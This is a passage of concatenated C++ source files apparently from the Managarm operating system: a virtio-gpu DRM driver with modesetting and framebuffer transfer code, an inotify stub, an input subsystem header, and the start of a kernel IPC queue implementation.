COFIBER_ROUTINE(cofiber::no_future, serveDevice(std::shared_ptr<drm_core::Device> device,
		helix::UniqueLane p), ([device = std::move(device), lane = std::move(p)] {
	std::cout << "unix device: Connection" << std::endl;

	while(true) {
		// Wait for the next request; the ancillary item carries the
		// per-request conversation lane.
		helix::Accept accept;
		helix::RecvInline recv_req;

		auto &&header = helix::submitAsync(lane, helix::Dispatcher::global(),
				helix::action(&accept, kHelItemAncillary),
				helix::action(&recv_req));
		COFIBER_AWAIT header.async_wait();
		HEL_CHECK(accept.error());
		HEL_CHECK(recv_req.error());

		auto conversation = accept.descriptor();

		managarm::fs::CntRequest req;
		req.ParseFromArray(recv_req.data(), recv_req.length());
		if(req.req_type() == managarm::fs::CntReqType::DEV_OPEN) {
			// Open flags are not supported for this device.
			assert(!req.flags());

			helix::SendBuffer send_resp;
			helix::PushDescriptor push_pt;
			helix::PushDescriptor push_page;

			// Create the file and serve it on its own stream.
			helix::UniqueLane local_lane, remote_lane;
			std::tie(local_lane, remote_lane) = helix::createStream();
			auto file = smarter::make_shared<drm_core::File>(device);
			async::detach(protocols::fs::servePassthrough(
					std::move(local_lane), file, &fileOperations));

			managarm::fs::SvrResponse resp;
			resp.set_error(managarm::fs::Errors::SUCCESS);
			resp.set_caps(managarm::fs::FC_STATUS_PAGE);

			// Reply with the passthrough lane and the status page memory.
			auto ser = resp.SerializeAsString();
			auto &&transmit = helix::submitAsync(conversation, helix::Dispatcher::global(),
					helix::action(&send_resp, ser.data(), ser.size(), kHelItemChain),
					helix::action(&push_pt, remote_lane, kHelItemChain),
					helix::action(&push_page, file->statusPageMemory()));
			COFIBER_AWAIT transmit.async_wait();
			HEL_CHECK(send_resp.error());
			HEL_CHECK(push_pt.error());
			HEL_CHECK(push_page.error());
		}else{
			throw std::runtime_error("Invalid request in serveDevice()");
		}
	}
}))
// ----------------------------------------------------------------
// GfxDevice.
// ----------------------------------------------------------------
struct AwaitableRequest : virtio_core::Request {
static void complete(virtio_core::Request *base) {
auto self = static_cast<AwaitableRequest *>(base);
self->_handle.resume();
}
AwaitableRequest(virtio_core::Queue *queue, virtio_core::Handle descriptor)
: _queue{queue}, _descriptor{descriptor} { }
bool await_ready() {
return false;
}
void await_suspend(cofiber::coroutine_handle<> handle) {
_handle = handle;
_queue->postDescriptor(_descriptor, this, &AwaitableRequest::complete);
_queue->notify();
}
void await_resume() {
}
private:
virtio_core::Queue *_queue;
virtio_core::Handle _descriptor;
cofiber::coroutine_handle<> _handle;
};
// Takes ownership of the virtio transport. The device is claimed lazily,
// on the first modeset (see Configuration::_dispatch()).
GfxDevice::GfxDevice(std::unique_ptr<virtio_core::Transport> transport)
: _transport{std::move(transport)}, _claimedDevice{false} { }
// Brings up the virtio-gpu device: negotiates features, sets up the control
// and cursor virtqueues, creates one plane/CRTC/encoder triple per hardware
// scanout, and queries the host for enabled display modes to build connectors.
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::initialize(), ([=] {
	_transport->finalizeFeatures();
	_transport->claimQueues(2);
	// Queue 0 carries control commands, queue 1 cursor updates.
	_controlQ = _transport->setupQueue(0);
	_cursorQ = _transport->setupQueue(1);

	_transport->runDevice();

	auto num_scanouts = static_cast<uint32_t>(_transport->space().load(spec::cfg::numScanouts));
	for(size_t i = 0; i < num_scanouts; i++) {
		// One plane + CRTC + encoder per scanout, wired 1:1.
		auto plane = std::make_shared<Plane>(this, i);
		auto crtc = std::make_shared<Crtc>(this, i, plane);
		auto encoder = std::make_shared<Encoder>(this);

		plane->setupWeakPtr(plane);
		crtc->setupWeakPtr(crtc);
		encoder->setupWeakPtr(encoder);

		encoder->setupPossibleCrtcs({crtc.get()});
		encoder->setupPossibleClones({encoder.get()});
		encoder->setCurrentCrtc(crtc.get());

		registerObject(plane.get());
		registerObject(crtc.get());
		registerObject(encoder.get());

		setupCrtc(crtc.get());
		setupEncoder(encoder.get());

		_theCrtcs[i] = crtc;
		_theEncoders[i] = encoder;
	}

	// Issue a GET_DISPLAY_INFO command to learn which scanouts are enabled
	// and at what native resolution.
	spec::Header header;
	header.type = spec::cmd::getDisplayInfo;
	header.flags = 0;
	header.fenceId = 0;
	header.contextId = 0;
	header.padding = 0;

	spec::DisplayInfo info;

	virtio_core::Request request;  // NOTE(review): appears unused; the chain below carries the request.
	virtio_core::Chain chain;
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, chain, _controlQ,
			arch::dma_buffer_view{nullptr, &header, sizeof(spec::Header)});
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, chain, _controlQ,
			arch::dma_buffer_view{nullptr, &info, sizeof(spec::DisplayInfo)});
	COFIBER_AWAIT AwaitableRequest{_controlQ, chain.front()};

	// Iterate the fixed-size modes array (16 entries here) and create a
	// connector for each enabled scanout.
	// NOTE(review): indexing _theEncoders[i] assumes every enabled mode has
	// i < num_scanouts — confirm against the virtio-gpu spec.
	for(size_t i = 0; i < 16; i++) {
		if(info.modes[i].enabled) {
			auto connector = std::make_shared<Connector>(this);
			connector->setupWeakPtr(connector);
			connector->setupPossibleEncoders({_theEncoders[i].get()});
			connector->setCurrentEncoder(_theEncoders[i].get());
			connector->setCurrentStatus(1);

			registerObject(connector.get());
			attachConnector(connector.get());

			// Offer the standard DMT modes up to the native resolution,
			// sorted largest-area first.
			std::vector<drm_mode_modeinfo> supported_modes;
			drm_core::addDmtModes(supported_modes, info.modes[i].rect.width,
					info.modes[i].rect.height);
			std::sort(supported_modes.begin(), supported_modes.end(),
					[] (const drm_mode_modeinfo &u, const drm_mode_modeinfo &v) {
				return u.hdisplay * u.vdisplay > v.hdisplay * v.vdisplay;
			});
			connector->setModeList(supported_modes);

			_activeConnectors[i] = connector;
		}
	}
}))
// Creates a fresh atomic-modeset configuration object for this device.
std::unique_ptr<drm_core::Configuration> GfxDevice::createConfiguration() {
	return std::make_unique<Configuration>(this);
}
// Wraps a buffer object into a DRM framebuffer after validating that the
// BO is large enough for the requested geometry (32 bpp assumed: pitch is
// a multiple of 4 and covers at least one full row of pixels).
std::shared_ptr<drm_core::FrameBuffer> GfxDevice::createFrameBuffer(std::shared_ptr<drm_core::BufferObject> base_bo,
		uint32_t width, uint32_t height, uint32_t format, uint32_t pitch) {
	auto buffer = std::static_pointer_cast<GfxDevice::BufferObject>(base_bo);

	assert(pitch % 4 == 0);
	assert(pitch / 4 >= width);
	assert(buffer->getSize() >= pitch * height);

	auto framebuffer = std::make_shared<FrameBuffer>(this, buffer);
	framebuffer->setupWeakPtr(framebuffer);
	registerObject(framebuffer.get());
	return framebuffer;
}
// Reports the driver version as (major, minor, patch).
std::tuple<int, int, int> GfxDevice::driverVersion() {
	return std::make_tuple(0, 0, 1);
}

// Reports the (name, description, date) strings identifying this driver.
std::tuple<std::string, std::string, std::string> GfxDevice::driverInfo() {
	return std::make_tuple(std::string{"virtio_gpu"},
			std::string{"virtio GPU"}, std::string{"0"});
}
// Allocates a "dumb" (CPU-accessible) buffer object of the requested
// geometry. Returns the BO together with its pitch (bytes per row).
std::pair<std::shared_ptr<drm_core::BufferObject>, uint32_t>
GfxDevice::createDumb(uint32_t width, uint32_t height, uint32_t bpp) {
	// Bytes per row of pixels.
	uint32_t pitch = width * bpp / 8;

	// Round the allocation up to whole 4 KiB pages.
	constexpr uint32_t pageSize = 4096;
	auto size = (width * height * bpp / 8 + (pageSize - 1)) & ~(pageSize - 1);

	HelHandle handle;
	HEL_CHECK(helAllocateMemory(size, 0, &handle));

	auto bo = std::make_shared<BufferObject>(this, _hwAllocator.allocate(), size,
			helix::UniqueDescriptor(handle), width, height);
	auto mapping = installMapping(bo.get());
	bo->setupMapping(mapping);
	// Kick off asynchronous host-side resource creation.
	bo->_initHw();
	return std::make_pair(bo, pitch);
}
// ----------------------------------------------------------------
// GfxDevice::Configuration.
// ----------------------------------------------------------------
// Validates a list of atomic-modeset property assignments and snapshots the
// per-scanout state (mode, dimensions, framebuffer) that commit() will apply.
// Returns false on an unsupported property or an inconsistent final state.
bool GfxDevice::Configuration::capture(std::vector<drm_core::Assignment> assignment) {
	// Lazily initializes the snapshot for one scanout, seeding the mode
	// from the CRTC's current mode.
	auto captureScanout = [&] (int index) {
		if(_state[index])
			return;

		_state[index].emplace();
		// TODO: Capture FB, width and height.
		_state[index]->mode = _device->_theCrtcs[index]->currentMode();
	};

	for(auto &assign : assignment) {
		if(assign.property == _device->srcWProperty()) {
			//TODO: check this outside of capture
			assert(assign.property->validate(assign));

			auto plane = static_cast<Plane *>(assign.object.get());
			captureScanout(plane->scanoutId());
			_state[plane->scanoutId()]->width = assign.intValue;
		}else if(assign.property == _device->srcHProperty()) {
			//TODO: check this outside of capture
			assert(assign.property->validate(assign));

			auto plane = static_cast<Plane *>(assign.object.get());
			captureScanout(plane->scanoutId());
			_state[plane->scanoutId()]->height = assign.intValue;
		}else if(assign.property == _device->fbIdProperty()) {
			//TODO: check this outside of capture
			assert(assign.property->validate(assign));

			auto plane = static_cast<Plane *>(assign.object.get());
			auto fb = assign.objectValue->asFrameBuffer();
			captureScanout(plane->scanoutId());
			_state[plane->scanoutId()]->fb = static_cast<GfxDevice::FrameBuffer *>(fb);
		}else if(assign.property == _device->modeIdProperty()) {
			//TODO: check this outside of capture.
			assert(assign.property->validate(assign));

			auto crtc = static_cast<Crtc *>(assign.object.get());
			captureScanout(crtc->scanoutId());
			_state[crtc->scanoutId()]->mode = assign.blobValue;
		}else{
			// Unknown property: reject the whole configuration.
			return false;
		}
	}

	// Post-validate each touched scanout: derive width/height from the mode
	// blob and require a framebuffer whenever a mode is set.
	for(size_t i = 0; i < _state.size(); i++) {
		if(!_state[i])
			continue;

		if(_state[i]->mode) {
			// TODO: Consider current width/height if FB did not change.
			drm_mode_modeinfo mode_info;
			memcpy(&mode_info, _state[i]->mode->data(), sizeof(drm_mode_modeinfo));
			_state[i]->height = mode_info.vdisplay;
			_state[i]->width = mode_info.hdisplay;

			// TODO: Check max dimensions: _state[i]->width > 1024 || _state[i]->height > 768
			if(_state[i]->width <= 0 || _state[i]->height <= 0)
				return false;
			if(!_state[i]->fb)
				return false;
		}
	}
	return true;
}
// Nothing to release: capture() only stores plain state, no resources.
void GfxDevice::Configuration::dispose() {
}
// Publishes the captured mode on each affected CRTC, then kicks off the
// asynchronous hardware programming via _dispatch().
void GfxDevice::Configuration::commit() {
	for(size_t i = 0; i < _state.size(); i++) {
		if(_state[i])
			_device->_theCrtcs[i]->setCurrentMode(_state[i]->mode);
	}

	_dispatch();
}
// Asynchronously programs the hardware for every captured scanout: claims
// the device on first use, then either disables the scanout (no mode) or
// transfers the framebuffer to the host, binds it to the scanout and
// flushes it. Calls complete() once all scanouts are done.
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::Configuration::_dispatch(), ([=] {
	for(size_t i = 0; i < _state.size(); i++) {
		if(!_state[i])
			continue;

		// Claim the device lazily, on the first real modeset.
		if(!_device->_claimedDevice) {
			COFIBER_AWAIT _device->_transport->hwDevice().claimDevice();
			_device->_claimedDevice = true;
		}

		if(!_state[i]->mode) {
			// A zero-filled SET_SCANOUT command detaches the scanout.
			std::cout << "gfx/virtio: Disable scanout" << std::endl;
			spec::SetScanout scanout;
			memset(&scanout, 0, sizeof(spec::SetScanout));
			scanout.header.type = spec::cmd::setScanout;

			spec::Header scanout_result;
			virtio_core::Request scanout_request;  // NOTE(review): appears unused.
			virtio_core::Chain scanout_chain;
			COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice,
					scanout_chain, _device->_controlQ,
					arch::dma_buffer_view{nullptr, &scanout, sizeof(spec::SetScanout)});
			COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost,
					scanout_chain, _device->_controlQ,
					arch::dma_buffer_view{nullptr, &scanout_result, sizeof(spec::Header)});
			COFIBER_AWAIT AwaitableRequest{_device->_controlQ, scanout_chain.front()};

			continue;
		}

		// Wait until the BO's backing store is attached on the host.
		COFIBER_AWAIT _state[i]->fb->getBufferObject()->wait();

//		std::cout << "Swap to framebuffer " << _state[i]->fb->id()
//				<< " " << _state[i]->width << "x" << _state[i]->height << std::endl;

		// Step 1: copy the guest framebuffer contents to the host resource.
		spec::XferToHost2d xfer;
		memset(&xfer, 0, sizeof(spec::XferToHost2d));
		xfer.header.type = spec::cmd::xferToHost2d;
		xfer.rect.x = 0;
		xfer.rect.y = 0;
		xfer.rect.width = _state[i]->width;
		xfer.rect.height = _state[i]->height;
		xfer.resourceId = _state[i]->fb->getBufferObject()->hardwareId();

		spec::Header xfer_result;
		virtio_core::Chain xfer_chain;
		COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice,
				xfer_chain, _device->_controlQ,
				arch::dma_buffer_view{nullptr, &xfer, sizeof(spec::XferToHost2d)});
		COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost,
				xfer_chain, _device->_controlQ,
				arch::dma_buffer_view{nullptr, &xfer_result, sizeof(spec::Header)});
		COFIBER_AWAIT AwaitableRequest{_device->_controlQ, xfer_chain.front()};
		assert(xfer_result.type == spec::resp::noData);

		// Step 2: bind the resource to this scanout.
		spec::SetScanout scanout;
		memset(&scanout, 0, sizeof(spec::SetScanout));
		scanout.header.type = spec::cmd::setScanout;
		scanout.rect.x = 0;
		scanout.rect.y = 0;
		scanout.rect.width = _state[i]->width;
		scanout.rect.height = _state[i]->height;
		scanout.scanoutId = i;
		scanout.resourceId = _state[i]->fb->getBufferObject()->hardwareId();

		spec::Header scanout_result;
		virtio_core::Chain scanout_chain;
		COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice,
				scanout_chain, _device->_controlQ,
				arch::dma_buffer_view{nullptr, &scanout, sizeof(spec::SetScanout)});
		COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost,
				scanout_chain, _device->_controlQ,
				arch::dma_buffer_view{nullptr, &scanout_result, sizeof(spec::Header)});
		COFIBER_AWAIT AwaitableRequest{_device->_controlQ, scanout_chain.front()};
		assert(scanout_result.type == spec::resp::noData);

		// Step 3: flush the resource so the host actually displays it.
		spec::ResourceFlush flush;
		memset(&flush, 0, sizeof(spec::ResourceFlush));
		flush.header.type = spec::cmd::resourceFlush;
		flush.rect.x = 0;
		flush.rect.y = 0;
		flush.rect.width = _state[i]->width;
		flush.rect.height = _state[i]->height;
		flush.resourceId = _state[i]->fb->getBufferObject()->hardwareId();

		spec::Header flush_result;
		virtio_core::Chain flush_chain;
		COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice,
				flush_chain, _device->_controlQ,
				arch::dma_buffer_view{nullptr, &flush, sizeof(spec::ResourceFlush)});
		COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost,
				flush_chain, _device->_controlQ,
				arch::dma_buffer_view{nullptr, &flush_result, sizeof(spec::Header)});
		COFIBER_AWAIT AwaitableRequest{_device->_controlQ, flush_chain.front()};
		assert(flush_result.type == spec::resp::noData);
	}

	complete();
}))
// ----------------------------------------------------------------
// GfxDevice::Connector.
// ----------------------------------------------------------------
// Allocates a DRM object ID for the connector. Encoder wiring happens in
// GfxDevice::initialize() (hence the commented-out code below).
GfxDevice::Connector::Connector(GfxDevice *device)
	: drm_core::Connector { device->allocator.allocate() } {
//	_encoders.push_back(device->_theEncoder.get());
}
// ----------------------------------------------------------------
// GfxDevice::Encoder.
// ----------------------------------------------------------------
// Allocates a DRM object ID for the encoder; all wiring (CRTCs, clones)
// happens in GfxDevice::initialize().
GfxDevice::Encoder::Encoder(GfxDevice *device)
:drm_core::Encoder { device->allocator.allocate() } {
}
// ----------------------------------------------------------------
// GfxDevice::Crtc.
// ----------------------------------------------------------------
// CRTC for one virtio-gpu scanout; owns its primary plane.
GfxDevice::Crtc::Crtc(GfxDevice *device, int id, std::shared_ptr<Plane> plane)
:drm_core::Crtc { device->allocator.allocate() } {
	_primaryPlane = plane;
	_scanoutId = id;
	_device = device;
}

// The plane that scans out this CRTC's framebuffer.
drm_core::Plane *GfxDevice::Crtc::primaryPlane() {
	return _primaryPlane.get();
}

// Index of the virtio-gpu scanout driven by this CRTC.
int GfxDevice::Crtc::scanoutId() {
	return _scanoutId;
}
// ----------------------------------------------------------------
// GfxDevice::FrameBuffer.
// ----------------------------------------------------------------
// DRM framebuffer wrapping a single buffer object.
GfxDevice::FrameBuffer::FrameBuffer(GfxDevice *device,
		std::shared_ptr<GfxDevice::BufferObject> bo)
: drm_core::FrameBuffer { device->allocator.allocate() } {
	_device = device;
	_bo = bo;
}

// Returns the buffer object backing this framebuffer.
GfxDevice::BufferObject *GfxDevice::FrameBuffer::getBufferObject() {
	return _bo.get();
}

// Called when the framebuffer contents change; pushes the pixel data to
// the host and flushes the resource.
void GfxDevice::FrameBuffer::notifyDirty() {
	_xferAndFlush();
}
// Transfers the full framebuffer rectangle to the host resource
// (TRANSFER_TO_HOST_2D) and then flushes it to the display (RESOURCE_FLUSH).
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::FrameBuffer::_xferAndFlush(), ([=] {
	spec::XferToHost2d xfer;
	memset(&xfer, 0, sizeof(spec::XferToHost2d));
	xfer.header.type = spec::cmd::xferToHost2d;
	xfer.rect.x = 0;
	xfer.rect.y = 0;
	xfer.rect.width = _bo->getWidth();
	xfer.rect.height = _bo->getHeight();
	xfer.resourceId = _bo->hardwareId();

	spec::Header xfer_result;
	virtio_core::Request xfer_request;  // NOTE(review): appears unused.
	virtio_core::Chain xfer_chain;
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, xfer_chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, &xfer, sizeof(spec::XferToHost2d)});
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, xfer_chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, &xfer_result, sizeof(spec::Header)});
	COFIBER_AWAIT AwaitableRequest{_device->_controlQ, xfer_chain.front()};

	spec::ResourceFlush flush;
	memset(&flush, 0, sizeof(spec::ResourceFlush));
	flush.header.type = spec::cmd::resourceFlush;
	flush.rect.x = 0;
	flush.rect.y = 0;
	flush.rect.width = _bo->getWidth();
	flush.rect.height = _bo->getHeight();
	flush.resourceId = _bo->hardwareId();

	spec::Header flush_result;
	virtio_core::Request flush_request;  // NOTE(review): appears unused.
	virtio_core::Chain flush_chain;
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, flush_chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, &flush, sizeof(spec::ResourceFlush)});
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, flush_chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, &flush_result, sizeof(spec::Header)});
	COFIBER_AWAIT AwaitableRequest{_device->_controlQ, flush_chain.front()};
}));
// ----------------------------------------------------------------
// GfxDevice: Plane.
// ----------------------------------------------------------------
// Plane for one scanout. Only the scanout index is stored; the device is
// used solely for DRM object ID allocation here.
GfxDevice::Plane::Plane(GfxDevice *device, int id)
:drm_core::Plane { device->allocator.allocate() } {
	_scanoutId = id;
}

// Index of the virtio-gpu scanout that this plane feeds.
int GfxDevice::Plane::scanoutId() {
	return _scanoutId;
}
// ----------------------------------------------------------------
// GfxDevice: BufferObject.
// ----------------------------------------------------------------
std::shared_ptr<drm_core::BufferObject> GfxDevice::BufferObject::sharedBufferObject() {
return this->shared_from_this();
}
size_t GfxDevice::BufferObject::getSize() {
return _size;
}
uint32_t GfxDevice::BufferObject::getWidth() {
return _width;
}
uint32_t GfxDevice::BufferObject::getHeight() {
return _height;
}
uint32_t GfxDevice::BufferObject::hardwareId() {
return _hardwareId;
}
async::result<void> GfxDevice::BufferObject::wait() {
return async::make_result(_jump.async_wait());
}
std::pair<helix::BorrowedDescriptor, uint64_t> GfxDevice::BufferObject::getMemory() {
return std::make_pair(helix::BorrowedDescriptor(_memory), 0);
}
// Creates the host-side 2D resource for this BO and attaches the guest
// pages as backing storage. Triggers _jump on completion so wait() resolves.
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::BufferObject::_initHw(), ([=] {
	// Map the BO so its pages can be translated to physical addresses.
	// NOTE(review): this mapping is never unmapped here — confirm whether
	// that is intentional.
	void *ptr;
	HEL_CHECK(helMapMemory(_memory.getHandle(), kHelNullHandle,
			nullptr, 0, getSize(), kHelMapProtRead, &ptr));

	// Step 1: create the 2D resource (BGRX pixel format).
	spec::Create2d buffer;
	memset(&buffer, 0, sizeof(spec::Create2d));
	buffer.header.type = spec::cmd::create2d;
	buffer.resourceId = _hardwareId;
	buffer.format = spec::format::bgrx;
	buffer.width = getWidth();
	buffer.height = getHeight();

	spec::Header result;
	virtio_core::Request request;  // NOTE(review): appears unused.
	virtio_core::Chain chain;
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, &buffer, sizeof(spec::Create2d)});
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, &result, sizeof(spec::Header)});
	COFIBER_AWAIT AwaitableRequest{_device->_controlQ, chain.front()};

	// Step 2: collect one scatter-gather entry per 4 KiB page.
	std::vector<spec::MemEntry> entries;
	for(size_t page = 0; page < getSize(); page += 4096) {
		spec::MemEntry entry;
		memset(&entry, 0, sizeof(spec::MemEntry));
		uintptr_t physical;
		HEL_CHECK(helPointerPhysical((reinterpret_cast<char *>(ptr) + page), &physical));
		entry.address = physical;
		entry.length = 4096;
		entries.push_back(entry);
	}

	// Step 3: attach the page list as backing storage of the resource.
	spec::AttachBacking attachment;
	memset(&attachment, 0, sizeof(spec::AttachBacking));
	attachment.header.type = spec::cmd::attachBacking;
	attachment.resourceId = _hardwareId;
	attachment.numEntries = entries.size();

	spec::Header attach_result;
	virtio_core::Chain attach_chain;
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, attach_chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, &attachment, sizeof(spec::AttachBacking)});
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, attach_chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, entries.data(), entries.size() * sizeof(spec::MemEntry)});
	COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, attach_chain, _device->_controlQ,
			arch::dma_buffer_view{nullptr, &attach_result, sizeof(spec::Header)});
	COFIBER_AWAIT AwaitableRequest{_device->_controlQ, attach_chain.front()};
	assert(attach_result.type == spec::resp::noData);

	// Unblock waiters: the resource is now fully set up.
	_jump.trigger();
}));
// ----------------------------------------------------------------
// Freestanding PCI discovery functions.
// ----------------------------------------------------------------
// Binds one detected virtio-gpu PCI device: discovers the virtio transport,
// initializes the GfxDevice and publishes it on mbus as a DRM card.
COFIBER_ROUTINE(cofiber::no_future, bindController(mbus::Entity entity), ([=] {
	protocols::hw::Device hw_device(COFIBER_AWAIT entity.bind());
	auto transport = COFIBER_AWAIT virtio_core::discover(std::move(hw_device),
			virtio_core::DiscoverMode::modernOnly);

	auto gfx_device = std::make_shared<GfxDevice>(std::move(transport));
	// Fire-and-forget: device initialization runs asynchronously.
	gfx_device->initialize();

	// Create an mbus object for the device.
	auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();

	mbus::Properties descriptor{
		{"unix.subsystem", mbus::StringItem{"drm"}},
		{"unix.devname", mbus::StringItem{"dri/card0"}}
	};

	auto handler = mbus::ObjectHandler{}
	.withBind([=] () -> async::result<helix::UniqueDescriptor> {
		// Each bind gets a fresh stream; this side keeps serving the
		// local end while the remote end is returned to the client.
		helix::UniqueLane local_lane, remote_lane;
		std::tie(local_lane, remote_lane) = helix::createStream();
		serveDevice(gfx_device, std::move(local_lane));

		async::promise<helix::UniqueDescriptor> promise;
		promise.set_value(std::move(remote_lane));
		return promise.async_get();
	});

	COFIBER_AWAIT root.createObject("gfx_virtio", descriptor, std::move(handler));
}))
// Watches mbus for virtio-gpu PCI functions (vendor 1af4, device 1050) and
// binds each one as it appears.
COFIBER_ROUTINE(cofiber::no_future, observeControllers(), ([] {
	auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();

	auto filter = mbus::Conjunction({
		mbus::EqualsFilter("pci-vendor", "1af4"),
		mbus::EqualsFilter("pci-device", "1050")
	});

	auto handler = mbus::ObserverHandler{}
	.withAttach([] (mbus::Entity entity, mbus::Properties properties) {
		std::cout << "gfx/virtio: Detected device" << std::endl;
		bindController(std::move(entity));
	});

	COFIBER_AWAIT root.linkObserver(std::move(filter), std::move(handler));
}))
// Driver entry point: registers the PCI observer, then runs the global
// helix event loop (which never returns in normal operation).
int main() {
	std::cout << "gfx/virtio: Starting driver" << std::endl;

	{
		// Bind the asynchronous operations started below to the global queue.
		async::queue_scope scope{helix::globalQueue()};
		observeControllers();
	}

	helix::globalQueue()->run();

	return 0;
}
<file_sep>
#include <string.h>
#include <iostream>
#include <async/doorbell.hpp>
#include <cofiber.hpp>
#include <helix/ipc.hpp>
#include "inotify.hpp"
namespace inotify {
namespace {
// Skeleton inotify file: serves the passthrough protocol but does not yet
// implement reading or polling of events.
struct OpenFile : File {
public:
	// Starts serving the passthrough protocol on a fresh stream; the
	// remote end is handed out via getPassthroughLane().
	static void serve(smarter::shared_ptr<OpenFile> file) {
		//TODO: assert(!file->_passthrough);

		helix::UniqueLane lane;
		std::tie(lane, file->_passthrough) = helix::createStream();
		async::detach(protocols::fs::servePassthrough(std::move(lane),
				smarter::shared_ptr<File>{file}, &File::fileOperations));
	}

	OpenFile()
	: File{StructName::get("inotify")} { }

	// Reading inotify events is not implemented; any read() aborts.
	COFIBER_ROUTINE(expected<size_t>,
	readSome(Process *, void *data, size_t max_length) override, ([=] {
		throw std::runtime_error("read() from inotify is not implemented");
	}))

	// Stub: logs a warning and suspends forever (never reports events).
	COFIBER_ROUTINE(expected<PollResult>, poll(Process *, uint64_t sequence,
			async::cancellation_token) override, ([=] {
		std::cout << "posix: Fix inotify::poll()" << std::endl;
		COFIBER_AWAIT cofiber::suspend_always{};
	}))

	helix::BorrowedDescriptor getPassthroughLane() override {
		return _passthrough;
	}

private:
	helix::UniqueLane _passthrough;
};
} // anonymous namespace
// Creates a new inotify instance and returns a handle to it.
smarter::shared_ptr<File, FileHandle> createFile() {
	auto openFile = smarter::make_shared<OpenFile>();
	openFile->setupWeakFile(openFile);
	OpenFile::serve(openFile);
	return File::constructHandle(std::move(openFile));
}
} // namespace inotify
<file_sep>#ifndef POSIX_SUBSYSTEM_INPUT_SYSTEM_HPP
#define POSIX_SUBSYSTEM_INPUT_SYSTEM_HPP
#include <cofiber.hpp>
namespace input_subsystem {

// Launches the input subsystem as a detached coroutine (no_future: the
// caller does not await completion).
cofiber::no_future run();

} // namespace input_subsystem
#endif // POSIX_SUBSYSTEM_INPUT_SYSTEM_HPP
<file_sep>
#include <string.h>
#include <frg/container_of.hpp>
#include <frigg/debug.hpp>
#include "ipc-queue.hpp"
#include "kernel.hpp"
namespace thor {
// ----------------------------------------------------------------------------
// IpcQueue
// ----------------------------------------------------------------------------
// Pins the user-space queue header in memory and reads its size; the chunk
// table is sized to 2^sizeShift entries.
IpcQueue::IpcQueue(smarter::shared_ptr<AddressSpace, BindableHandle> space, void *pointer)
: _space{frigg::move(space)}, _pointer{pointer},
		_waitInFutex{false},
		_currentChunk{nullptr}, _currentProgress{0}, _nextIndex{0},
		_chunks{*kernelAlloc} {
	_queuePin = AddressSpaceLockHandle{_space, _pointer, sizeof(QueueStruct)};
	_acquireNode.setup(nullptr);
	auto acq = _queuePin.acquire(&_acquireNode);
	// The acquire is expected to complete synchronously here (asserted).
	assert(acq);
	_queueAccessor = DirectSpaceAccessor<QueueStruct>{_queuePin, 0};

	// TODO: Take this as a constructor parameter.
	_sizeShift = _queueAccessor.get()->sizeShift;

	_chunks.resize(1 << _sizeShift);
}
// Registers (or replaces) the chunk at the given index of the chunk table.
// The chunk that is currently being filled must not be replaced.
void IpcQueue::setupChunk(size_t index, smarter::shared_ptr<AddressSpace, BindableHandle> space, void *pointer) {
	auto irqGuard = frigg::guard(&irqMutex());
	auto queueGuard = frigg::guard(&_mutex);

	assert(index < _chunks.size());
	assert(&_chunks[index] != _currentChunk);
	_chunks[index] = Chunk{frigg::move(space), pointer};
}
// Enqueues a node for emission into the user-space queue. If the queue was
// idle, emission starts immediately; otherwise the node waits its turn and
// is later driven by the Ops::ready worklet.
void IpcQueue::submit(IpcNode *node) {
	auto irq_lock = frigg::guard(&irqMutex());
	auto lock = frigg::guard(&_mutex);

	struct Ops {
		// Worklet entry: re-acquires the locks and resumes emission.
		static void ready(Worklet *worklet) {
			auto node = frg::container_of(worklet, &IpcNode::_worklet);
			auto self = node->_queue;

			auto irq_lock = frigg::guard(&irqMutex());
			auto lock = frigg::guard(&self->_mutex);
			self->_progress();
		}
	};

	assert(!node->_queueNode.in_list);
	node->_queue = this;
	node->_worklet.setup(&Ops::ready);

	auto was_empty = _nodeQueue.empty();
	_nodeQueue.push_back(node);
	// Only kick emission if nobody is already draining the queue.
	if(was_empty)
		_progress();
}
// Emits the next queued node into the current user-space chunk. Advances or
// retires chunks as needed; returns early when parked on the head futex.
// Remaining nodes are processed via a re-posted worklet rather than looping.
void IpcQueue::_progress() {
	while(true) {
		assert(!_waitInFutex);
		assert(!_nodeQueue.empty());

		// Advance the queue if necessary.
		if(!_currentChunk) {
			_advanceChunk();
			// _advanceChunk() may have parked us on the head futex.
			if(_waitInFutex)
				return;
		}

		// Check if we have to retire the current chunk.
		// Each source buffer is emitted 8-byte aligned, hence the rounding.
		size_t length = 0;
		for(auto source = _nodeQueue.front()->_source; source; source = source->link)
			length += (source->size + 7) & ~size_t(7);
